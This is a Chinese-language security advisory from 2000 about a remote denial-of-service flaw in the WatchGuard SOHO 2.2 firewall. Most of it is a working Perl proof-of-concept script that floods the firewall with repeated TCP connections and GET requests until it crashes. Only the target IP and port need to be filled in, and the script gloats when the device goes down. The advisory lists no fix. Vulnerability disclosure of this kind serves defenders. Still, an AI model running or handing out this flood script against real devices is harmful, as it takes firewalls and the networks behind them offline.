Watchguard SOHO 2.2存在拒绝服务漏洞发布时间:2000-12-11 更新时间:2000-12-11 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 WatchGuard SOHO 2.2详细描述 WatchGuard SOHO 2.2 是一个SOHU防火墙,其中固件版本为2.2.1的存在 一个问题可以允许远程用户执行拒绝服务攻击。通过大数量的GET请求(70+), 可以消耗防火墙的资源,需要重新启动获得正常功能。 测试代码 #!/usr/bin/perl # # You can also connect to the Watchguard SOHO through your # browser and press F5 like a maniac on speed to get the # firewall crashing. So, either you run the .pl script or # you fire up your webbrowser... Either way, it works. # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # (c)Proof of concept, vorlon <filip@securax.be> # ---------------------------------------------------------- use IO::Socket; $host = "your_watchguard_ip"; $port = "your_port"; $repeat = "100"; $request = "GET / HTTP/1.0"; print "Watchguard SOHO Denial of Service, connecting to $host:$port...\n"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Failed.\n"; $counter = 0; print "Repeating request for $repeat times.\n"; while($counter < $repeat) { print $socket "$request\n"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "\nThe Watchguard SOHO has crashed. BEEFCAKE!...\n"; print "."; $counter += 1; } print "\nDone.\n\n"; close($socket); 解决方案 尚无 相关信息 |
